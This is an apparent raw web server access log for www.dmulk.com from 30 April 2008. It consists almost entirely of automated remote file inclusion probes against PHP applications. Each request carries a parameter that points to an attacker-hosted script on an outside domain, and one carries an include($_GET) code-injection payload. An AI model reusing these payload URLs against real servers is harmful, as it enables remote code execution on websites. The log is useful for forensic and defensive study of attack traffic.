211.233.12.225 - - [30/Apr/2008:09:49:12 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:09:49:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:49:12 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:49:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:09:49:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:49:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:09:49:24 -0700] "GET /logs/nav.php?go=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:09:49:26 -0700] "GET /nav.php?go=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:49:29 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:49:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:49:29 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:49:30 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:49:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:49:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:49:30 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:09:49:47 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:09:49:47 -0700] "GET //plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.245.149.155 - - [30/Apr/2008:09:49:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [30/Apr/2008:09:49:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.37.115 - - [30/Apr/2008:09:50:13 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:09:50:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:09:50:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:09:50:24 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:50:29 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:50:55 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:50:55 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:50:56 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:09:51:00 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:09:51:01 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:51:22 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:51:22 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:51:22 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.97.24.172 - - [30/Apr/2008:09:51:25 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
91.97.24.172 - - [30/Apr/2008:09:51:25 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:52:11 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:52:11 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:52:11 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:28 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:28 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:28 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:34 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:43 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:43 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:43 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:52:50 -0700] "GET /logs/access_080321.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:09:52:51 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:09:52:54 -0700] "GET /logs/access_080123.log/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:09:52:54 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:09:52:54 -0700] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:09:52:57 -0700] "GET /logs/access_080114.log/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:09:53:11 -0700] "GET //plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:53:13 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:53:13 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:53:14 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:53:19 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:53:19 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:53:19 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:53:24 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:53:24 -0700] "GET //ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:53:24 -0700] "GET /logs//ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:12 -0700] "GET /logs/!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:13 -0700] "GET /!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:09:54:17 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:28 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:28 -0700] "GET //Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:54:29 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:54:29 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:54:29 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:29 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:48 -0700] "GET /logs/!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:49 -0700] "GET /!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:49 -0700] "GET /logs/!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:54:49 -0700] "GET /!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:55:01 -0700] "GET /logs/!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:55:06 -0700] "GET /!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:55:37 -0700] "GET /logs/!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:55:38 -0700] "GET /!scanhttp://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:55:49 -0700] "GET /logs/access_080218.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:09:55:51 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:09:55:52 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:55:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:55:53 -0700] "GET //ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:55:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [30/Apr/2008:09:55:54 -0700] "GET /logs/index.php?content=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [30/Apr/2008:09:55:58 -0700] "GET /index.php?content=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.36.8 - - [30/Apr/2008:09:56:11 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [30/Apr/2008:09:56:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pcpaclass16.com/user/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.213.0.1 - - [30/Apr/2008:09:56:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/install/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:09:56:34 -0700] "GET /logs/access_080123.log/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:09:56:35 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:09:56:35 -0700] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.213.0.1 - - [30/Apr/2008:09:56:35 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/install/test.txt???? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:56:41 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:56:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:56:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:09:56:50 -0700] "GET /logs/access_080114.log/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:09:57:07 -0700] "GET /index.php?body=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:57:22 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [30/Apr/2008:09:57:24 -0700] "GET //Neos_Chronos/header.php?base_folder=http://guhit.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:09:58:25 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:09:58:46 -0700] "GET //spaw_control.class.php?spaw_root=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.36.8 - - [30/Apr/2008:09:58:56 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:09:59:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:09:59:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:10:00:10 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:10:00:10 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:19 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:20 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:23 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:24 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:10:00:40 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.softsearch.co.kr/bemarket/goods/tes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:41 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
